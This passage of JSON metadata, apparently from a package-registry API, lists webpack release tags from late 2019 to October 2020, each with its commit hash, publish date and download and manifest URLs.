35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw